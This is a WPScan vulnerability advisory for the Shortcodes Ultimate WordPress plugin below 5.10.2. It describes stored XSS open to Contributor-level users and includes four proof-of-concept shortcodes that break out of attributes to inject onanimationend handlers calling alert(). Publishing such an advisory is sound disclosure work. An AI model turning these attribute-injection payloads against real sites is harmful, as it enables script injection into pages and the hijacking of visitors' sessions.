wpvulndb | apple502j | WPVDB-ID:7F5659BD-50C3-4725-95F4-CF88812ACF1C
History: Aug 23, 2021 - 12:00 a.m.

Shortcodes Ultimate < 5.10.2 - Contributor+ Stored XSS

2021-08-23 00:00:00
apple502j
wpscan.com
8

EPSS: 0.001 (Low), Percentile: 24.9%

The plugin allows users with the Contributor role to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some do escape, most don't, and there are even some attributes that are insecure by design (like [su_button]'s onclick attribute).

PoC

[su_accordion class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)']
[su_animate duration='1s;animation-name:twentytwentyone-close-button-transition;' type='" onanimationend="alert(2)']
[su_audio width='1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//' url="a"]
[su_box color='red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//']

CPE Name            | Operator | Version
shortcodes-ultimate | lt       | 5.10.2

